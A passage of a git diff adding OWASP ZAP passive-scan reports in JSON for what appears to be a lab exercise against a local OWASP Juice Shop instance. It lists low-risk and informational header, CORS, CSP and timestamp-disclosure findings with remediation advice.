"uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "5", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + } + ], + "count": "10", + "systemic": false, + "solution": "

Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance).

Configure the \"Access-Control-Allow-Origin\" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.

", + "otherinfo": "

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

", + "reference": "

https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy

", + "cweid": "264", + "wascid": "14", + "sourceid": "8" + }, + { + "pluginid": "10017", + "alertRef": "10017", + "alert": "Cross-Domain JavaScript Source File Inclusion", + "name": "Cross-Domain JavaScript Source File Inclusion", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "

The page includes one or more script files from a third-party domain.

", + "instances":[ + { + "id": "15", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "16", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "57", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "58", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "51", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "52", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "61", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "62", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "14", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "17", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "10", + "systemic": false, + "solution": "

Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

", + "otherinfo": "", + "reference": "", + "cweid": "829", + "wascid": "15", + "sourceid": "1" + }, + { + "pluginid": "10110", + "alertRef": "10110", + "alert": "Dangerous JS Functions", + "name": "Dangerous JS Functions", + "riskcode": "1", + "confidence": "1", + "riskdesc": "Low (Low)", + "desc": "

A dangerous JS function seems to be in use that would leave the site vulnerable.

", + "instances":[ + { + "id": "111", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "bypassSecurityTrustHtml(", + "otherinfo": "" + }, + { + "id": "112", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "bypassSecurityTrustHtml(", + "otherinfo": "" + } + ], + "count": "2", + "systemic": false, + "solution": "

See the references for security advice on the use of these functions.

", + "otherinfo": "", + "reference": "

https://v17.angular.io/guide/security

", + "cweid": "749", + "wascid": "-1", + "sourceid": "22" + }, + { + "pluginid": "10063", + "alertRef": "10063-2", + "alert": "Deprecated Feature Policy Header Set", + "name": "Deprecated Feature Policy Header Set", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "

The header has now been renamed to Permissions-Policy.

", + "instances":[ + { + "id": "87", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "100", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "83", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "107", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "110", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "106", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "109", + "uri": "http://localhost:3000/ftp/suspicious_errors.yml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "77", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "108", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "81", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "94", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + } + ], + "count": "11", + "systemic": false, + "solution": "

Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header instead of the Feature-Policy header.

", + "otherinfo": "", + "reference": "

https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy

https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/

", + "cweid": "16", + "wascid": "15", + "sourceid": "1" + }, + { + "pluginid": "90004", + "alertRef": "90004-2", + "alert": "Insufficient Site Isolation Against Spectre Vulnerability", + "name": "Insufficient Site Isolation Against Spectre Vulnerability", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "

Cross-Origin-Embedder-Policy header is a response header that prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).

", + "instances":[ + { + "id": "88", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "101", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "84", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "78", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "96", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "89", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "102", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "85", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "79", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "97", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "10", + "systemic": false, + "solution": "

Ensure that the application/web server sets the Cross-Origin-Embedder-Policy header appropriately, and that it sets the Cross-Origin-Embedder-Policy header to 'require-corp' for documents.

If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Embedder-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-embedder-policy).

", + "otherinfo": "", + "reference": "

https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy

", + "cweid": "693", + "wascid": "14", + "sourceid": "1" + }, + { + "pluginid": "10096", + "alertRef": "10096", + "alert": "Timestamp Disclosure - Unix", + "name": "Timestamp Disclosure - Unix", + "riskcode": "1", + "confidence": "1", + "riskdesc": "Low (Low)", + "desc": "

A timestamp was disclosed by the application/web server. - Unix

", + "instances":[ + { + "id": "30", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "41", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "34", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + }, + { + "id": "31", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "39", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "33", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + }, + { + "id": "43", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "25", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1680327869", + "otherinfo": "1680327869, which evaluates to: 2023-04-01 05:44:29." + }, + { + "id": "22", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1701244813", + "otherinfo": "1701244813, which evaluates to: 2023-11-29 08:00:13." + }, + { + "id": "40", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1818181818", + "otherinfo": "1818181818, which evaluates to: 2027-08-13 18:30:18." + }, + { + "id": "24", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1839622642", + "otherinfo": "1839622642, which evaluates to: 2028-04-17 22:17:22." + }, + { + "id": "26", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1863874346", + "otherinfo": "1863874346, which evaluates to: 2029-01-23 14:52:26." + }, + { + "id": "32", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1917098446", + "otherinfo": "1917098446, which evaluates to: 2030-10-01 15:20:46." + }, + { + "id": "45", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "23", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2033195021", + "otherinfo": "2033195021, which evaluates to: 2034-06-06 08:23:41." + }, + { + "id": "44", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + } + ], + "count": "16", + "systemic": false, + "solution": "

Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

", + "otherinfo": "

1650485437, which evaluates to: 2022-04-20 20:10:37.

", + "reference": "

https://cwe.mitre.org/data/definitions/200.html

", + "cweid": "497", + "wascid": "13", + "sourceid": "1" + }, + { + "pluginid": "10027", + "alertRef": "10027", + "alert": "Information Disclosure - Suspicious Comments", + "name": "Information Disclosure - Suspicious Comments", + "riskcode": "0", + "confidence": "1", + "riskdesc": "Informational (Low)", + "desc": "

The response appears to contain suspicious comments which may help an attacker.

", + "instances":[ + { + "id": "37", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "query", + "otherinfo": "The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet." + }, + { + "id": "48", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Query", + "otherinfo": "The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//www.w3.org/2000/svg\" viewBox=\"0 0 512 512\">Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.

", + "otherinfo": "

The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet.

", + "reference": "", + "cweid": "615", + "wascid": "13", + "sourceid": "22" + }, + { + "pluginid": "10109", + "alertRef": "10109", + "alert": "Modern Web Application", + "name": "Modern Web Application", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.

", + "instances":[ + { + "id": "19", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "59", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "53", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "64", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "72", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "70", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "71", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:365:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "74", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "73", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:421:3", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "69", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "20", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + } + ], + "count": "11", + "systemic": false, + "solution": "

This is an informational alert and so no changes are required.

", + "otherinfo": "

No links have been found while there are scripts, which is an indication that this is a modern web application.

", + "reference": "", + "cweid": "-1", + "wascid": "-1", + "sourceid": "1" + }, + { + "pluginid": "10049", + "alertRef": "10049-1", + "alert": "Non-Storable Content", + "name": "Non-Storable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.

", + "instances":[ + { + "id": "82", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + }, + { + "id": "104", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + }, + { + "id": "103", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + }, + { + "id": "75", + "uri": "http://localhost:3000/robots.txt", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "authorization:", + "otherinfo": "" + } + ], + "count": "4", + "systemic": false, + "solution": "

The content may be marked as storable by ensuring that the following conditions are satisfied:

The request method must be understood by the cache and defined as being cacheable (\"GET\", \"HEAD\", and \"POST\" are currently defined as cacheable)

The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)

The \"no-store\" cache directive must not appear in the request or response header fields

For caching by \"shared\" caches such as \"proxy\" caches, the \"private\" response directive must not appear in the response

For caching by \"shared\" caches such as \"proxy\" caches, the \"Authorization\" header field must not appear in the request, unless the response explicitly allows it (using one of the \"must-revalidate\", \"public\", or \"s-maxage\" Cache-Control response directives)

In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:

It must contain an \"Expires\" header field

It must contain a \"max-age\" response directive

For \"shared\" caches such as \"proxy\" caches, it must contain a \"s-maxage\" response directive

It must contain a \"Cache Control Extension\" that allows it to be cached

It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).

", + "otherinfo": "", + "reference": "

https://datatracker.ietf.org/doc/html/rfc7234

https://datatracker.ietf.org/doc/html/rfc7231

https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html

", + "cweid": "524", + "wascid": "13", + "sourceid": "24" + }, + { + "pluginid": "10049", + "alertRef": "10049-2", + "alert": "Storable but Non-Cacheable Content", + "name": "Storable but Non-Cacheable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The response contents are storable by caching components such as proxy servers, but will not be retrieved directly from the cache, without validating the request upstream, in response to similar requests from other users.

", + "instances":[ + { + "id": "86", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "99", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "105", + "uri": "http://localhost:3000/ftp/legal.md", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "76", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "80", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "91", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "98", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + } + ], + "count": "7", + "systemic": false, + "solution": "", + "otherinfo": "", + "reference": "

https://datatracker.ietf.org/doc/html/rfc7234

https://datatracker.ietf.org/doc/html/rfc7231

https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html

", + "cweid": "524", + "wascid": "13", + "sourceid": "1" + } + ] + } + ], + "sequences":[ + ] + +} diff --git a/labs/lab5/zap/zap-report-noauth.json b/labs/lab5/zap/zap-report-noauth.json new file mode 100644 index 00000000..a18ff439 --- /dev/null +++ b/labs/lab5/zap/zap-report-noauth.json @@ -0,0 +1,1609 @@ +{ + "@programName": "ZAP", + "@version": "2.16.1", + "@generated": "Mon, 13 Apr 2026 08:58:22", + "created": "2026-04-13T08:58:22.877184068Z", + "site":[ + { + "@name": "http://localhost:3000", + "@host": "localhost", + "@port": "3000", + "@ssl": "false", + "alerts": [ + { + "pluginid": "10038", + "alertRef": "10038-1", + "alert": "Content Security Policy (CSP) Header Not Set", + "name": "Content Security Policy (CSP) Header Not Set", + "riskcode": "2", + "confidence": "3", + "riskdesc": "Medium (High)", + "desc": "

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.

", + "instances":[ + { + "id": "4", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "107", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "93", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "95", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "77", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "81", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "94", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "83", + "uri": "http://localhost:3000/ftp/package.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "89", + "uri": "http://localhost:3000/ftp/suspicious_errors.yml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "103", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "79", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "102", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "87", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "111", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:286:9", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "109", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "106", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/layer.js:95:5", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "98", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "80", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "100", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "104", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "99", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "13", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "22", + "systemic": false, + "solution": "

Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.

", + "otherinfo": "", + "reference": "

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP

https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html

https://www.w3.org/TR/CSP/

https://w3c.github.io/webappsec-csp/

https://web.dev/articles/csp

https://caniuse.com/#feat=contentsecuritypolicy

https://content-security-policy.com/

